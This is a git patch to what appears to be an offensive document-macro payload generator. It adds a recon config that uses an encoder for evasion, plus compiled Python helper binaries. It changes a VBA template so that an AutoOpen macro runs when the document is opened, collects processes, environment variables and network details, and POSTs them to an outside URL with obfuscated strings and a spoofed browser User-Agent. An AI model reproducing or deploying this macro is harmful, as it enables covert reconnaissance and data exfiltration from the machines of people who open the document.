From a28e7089db05ccdbb890604c61bf8cd1bdd35762 Mon Sep 17 00:00:00 2001 From: chamilton Date: Wed, 9 Aug 2017 16:56:40 -0400 Subject: [PATCH] updated recon template --- configs/recon.json | 14 ++++++++++++++ lib/__init__.pyc | Bin 0 -> 157 bytes lib/encoder.pyc | Bin 0 -> 6211 bytes lib/helper.pyc | Bin 0 -> 4835 bytes templates/payloads/recon-template.vba | 13 ++++++++++++- 5 files changed, 26 insertions(+), 1 deletion(-) create mode 100755 configs/recon.json create mode 100644 lib/__init__.pyc create mode 100644 lib/encoder.pyc create mode 100644 lib/helper.pyc diff --git a/configs/recon.json b/configs/recon.json new file mode 100755 index 0000000..b061256 --- /dev/null +++ b/configs/recon.json @@ -0,0 +1,14 @@ +{ + "description": "Recon payload", + "template": "templates/payloads/recon-template.vba", + "varcount": 150, + "encodingoffset": 4, + "chunksize": 200, + "encodedvars": { + "URL":"http://ringzer0team.com" + }, + "vars": [], + "evasion": ["encoder"], + "payload": "" +} + diff --git a/lib/__init__.pyc b/lib/__init__.pyc new file mode 100644 index 0000000000000000000000000000000000000000..0161095fbb4b7950065c6c67e80709aa1f65c29c GIT binary patch literal 157 zcmZSn%**vJuQ@WA0SXv_v;z`WgATsrtzoiA6c7 z#d;ZuxtTd7`FZ;3nI)+ynI-zZi8-0cnfax~zKO|2`R=KCsYQt;`9=CUnMwNb@tJv< cCGqik1(hWnK%;DO^HWN5Qtdz%76UN@0PJ}sz5oCK literal 0 HcmV?d00001 diff --git a/lib/encoder.pyc b/lib/encoder.pyc new file mode 100644 index 0000000000000000000000000000000000000000..c69791a4899b73f9d51364329bddd98a48b2ccf3 GIT binary patch literal 6211 zcmcgwZC4w|6`olkfn)?Wc7q+`RwYg%yD7x&Y3Yk!+8CPTw9$vvIdKE#>{;&)uteI0 zot1+d^ojh6_H+M9|4~1;&GXz@A)xk&KUlW4!`+$LnLE$D_nA9W`FFGN-}L0GNR|I8 z`1=Pu_V*}a{Iu#RwRtLQwW&w-p4#+OjNg=sE9yI?PL%p;v%+t>?JB-c{)c~^VjAK` z8fCG`Pv`Ma_X!^R4-^J7$fy{DLuwAjfjkjL!*5nO6`N`*u8J_N;+hCEDxMahuHqRH z8Y-@fa7o1t5oT3?LvQd^c7O%u0I(y^9)(J<~fdx!5l@JK>;L$oxH%7PDwB>jInn z%}7I%7DXKmpPJ%vmhL3GGK$loXrf``C@H#o**6<`p5<*KDr#HP+wnPJ8;>jO2Bg)! ztZ!DMy)f??yRsMdlU|XftGh{I;-pyp0&9qpY+%0#qdfc6q$UrGEMM&<&sJq+CSN&t zQE)jykfccw1O(9%Af@a2M|we5^b(#(v!;B+!0bpX5P3Fqr1ZILCvlL8sCyLy@0ubQ z*(PxK(GM*VQ~J~$=?tPRzk#+>P!~S5=D{iPdQNjLND%j_xxfxTvJ+XtCCm^W9GEl? zI0v<}bXcY5o$`F4y+!$l5D@Z1PaWN(`s>?w)UcwCJyk$aL{Ei*QpS_Wi+Eo{|HGzw zf^J<|R|mbZL=G*^813cqH_Kzcfl6mPHai43|Fgl)4ji0fHYg4T1*Su|PXrYDzw^q# zO}mH+OXpO&rknah2Muj{3Jrtc=pk_ckpLs0bK(J@yF`m@fzt5|@Ioihi&qj0`VF-@ zyb6R!$Ml?zWpIA`bZh1Aqo> z0Y-SM7;^eDBF{{}jM~xzZ-5JLy@Xk~7&_W$mjhgsWp9Sum3Zq2F@3uwaEJ`=qCW^0 zW7ZKznS_t{^al?7N``#RbueoY^U6|$4YuFzN?Oq1XBSpN2P094Xa5TV-4#FK1aKk9 z0G_9*`2XTMA;xM64a=Kj+4+3 z3CX9;kdx%V7fAw(VC3ex$*qYCcFn_d*NC?X=i9<%ExRTSD03=wiL<`sCluWmBt#d# z+!e(?MI&Swl1s?oqMPuWI7BiD4?fjP=xqhcSjMbESl0Aq-SC$5ue^D^;zcBEK3ujq z1liX)1PqBy!sVhTQ={ON1=&8B9r>993i943iJvy@rYEOUVBc{qAI8%*dx2lf5WOf6` zh20T@W$gB_xDA_q{L`VVYl9&VW1;^&&6oF3^OXx@!vx!wig%P z@|W@6ruUx-t=oKkpT!c34^T)hz$k)K_{7e?gF?ejC^IvTt0SxV0p2D<6wVgGs509Z@t{oFEKF#%*DnU zrQfjlEef$}oZz%-9X9vb@&Lsoa5--(roU%R<@1nr!Aw4>Y7(mWzr?_Q9%%p*5g|UO z!T4*ufUolFqm4_Bbx2cE)FVjUVaEf{;o-?o+CgulDE$Qna2!U%$th(_T5_9!FXdV!?3)bOm?A z55RD1Ks~6Y%BvxF+2r_s5!u-yl0DpnA(_K97`Bb0VYxBjG7R8db1C2Ywo$|BR}M5p zUkp=M$1^}4gRU`!L`}ohT*96+jh5N61-lWh-I{!pjR_O2VeZ4edV+MuEeZP-6U2^w zmG-YQDPTD>-gVs5UHi!eHK;-gJpsVHYL!VXt^hBW`{F+2E9LImZ8Np%NXixM4brc9 zfh89d>q)=mQqOC&4{v)~f3&TxP;;{(n?r(1nn|e@OH0=Ik>z_`#%MigEnAv;x!I7v ztq)pq5t{r5x1kcITL1!rn%~ zyP@m)J!HEz@0PxaczM^G({tW}$RFvZ*YMg`(NEIZAV|Z$34+4q0sSl<^ziC)r}TMY z;M2s87k*6Xr!1HQ_$?McXYnzMdn{I22)?8)!Q@Y2&l;bJh0lF&jD|>WE|c*wxG;ik zL8y84dc9Jgs@LjOJQe((lTzf_s#AkJ>O6t_jPnEtlT%VKzwc0fNLLqHo7MR5eGefE B?>hhh literal 0 HcmV?d00001 diff --git a/lib/helper.pyc b/lib/helper.pyc new file mode 100644 index 0000000000000000000000000000000000000000..8ebfa3757653aabccde93acc7fd383995473dd1d GIT binary patch literal 4835 zcmcIoU2_yg6z$nfLUu_2DItgm?FYI_v5Q!iRcKjYfPiHdY9b=R)YN3BH#=l@CQSDR zQw2}>=+E*W`L3RGdv>!5zOf{IbEmtfKh8b(W2pbR-25wl`KYI=e|7x5j%L4xNbnn| zOsUO@9;nS=++S0hHI?9ZP9=5qn^G^8dbC;RI~%Qeyr2G!e_gi#^^VE*OgY&mK-YI@ z_IC(_4P;R+7jPjiQWIso^yWOb;n0Fg=0!Q8k_Ax~RdPg>hDsJiX{w|l%2AaxMOjkG zQBjsvvLwnel`M;LTqVauIibRh)^VPSC|qq{>DBOe+*Ud88N~BIJy$A%qSTXsmky}a zL`$VR!ub_I;5ECgIY>tlmpl7{#&>a^o6;?z@25CRlh~OXAX*-4#AQrB6>y1ld*+4Zpy}53-P*2?JlVD<0%lFkl|&Zf*eP$ zSF`X8a_lNqK9HWd31DK;YPz6B%5*K|y%On<#e# z;-_2T#@&0}+0v0WJB#+ec)W!{@8Up(4k`@vfSkfub$OZ;ci77eB2HV*ED`N~ndWX| z)aw~*XL=Jy!`&|nZnQc+$a_;a11zdj$$+hP~lollyrOqn|b(U*6IZ7wBeF zTxAgP7GtPz6h^`als6qT7|}GEor7RRel-~}j7@GcWg~{g$CtKnb|1|Mfq0j2YzVXv zL1q!?c%YBarkTafc?H3rO!v&9L}m!oJ21eDKpmV`$RAITHH2~)j^@-N5q?07x{Z+N zlL(Lb#3C-zuoAvPc7-&>l-UXI_Nd=CbC!D8oy7ps8!EDzY2x$Fcgs_d|z)=4$3jf`*2J$~!Ud&3dx6oK64rRnn`RAH>%v=6 z(``$|BIJ?Mf-WcQsho_H3SW-x#cm+QFX}Sud|$DL(u_VEIeif zWyoB24XrACPX?!gxms_G*#x)mG3DSap#x|n6MzDleEN8ppBaZKDS^k-%6)u7P(uYg z?i9Z9${xXI9>Lov2uz|~p>4cxGy!c}(pR9hKAHAMS#}^3WF{$@q;|J09~j{U%$CUY zti&gPfa&=-K{R|HQ)Y#v#M2ENp7HbsHmaglJvfV)b&71HfAZ!NR0}*z*jOobe)S+g z;g{|zXs?it;|%f;>c2#cBLPOjy-@?$hh|Ty4+i8HA*eSGkL3S(B;Y zJU<|7%lOWj50($(5EJVvXMF|n>lHEn*rirr@ta%kD%hIg**h4F4%^k#%G#Z$Z>xu5 zL0-1&2=!+IcmvF-!mh-U9pEBZmIk)%87U8@(Bb>UauzUf%?D^z)pj;$F~Ep5qlku$ zBC%Z*4dqJ}_T)!lNLI>sVo1w|44WZK(L*;58T3QRG9;k{uJ9vj!Xj>bcp=f=*#8p9 z_X$mB&qFK(3$?~VqtU3#&m80;p644!@OR0dfe?o$DTLjZsiDp6gaYt49@1~g3`v4Z I0e))#0O!0SS^xk5 literal 0 HcmV?d00001 diff --git a/templates/payloads/recon-template.vba b/templates/payloads/recon-template.vba index 2f8ae42..3947764 100644 --- a/templates/payloads/recon-template.vba +++ b/templates/payloads/recon-template.vba @@ -3,12 +3,23 @@ [use:env_list] [use:network_list] + +Sub AutoOpen() + env_query() +End Sub + Function env_query() As String Dim env_query1 As String + Set env_query2 = CreateObject(decode("{[MSXML2.ServerXMLHTTP]}")) env_query1 = process_list() env_query1 = env_query1 & Chr(10) & env_list() env_query1 = env_query1 & Chr(10) & network_list() - env_query = env_query1 + decode(env_query1) + + URL = decode("[URL]") + env_query2.Open "POST", URL, False + env_query2.setRequestHeader decode({["User-Agent", "Mozilla/4.0 (compatible; Recon MSIE 6.0; Windows NT 5.0)"]}) + env_query2.send(env_query1) End Function Function process_list() As String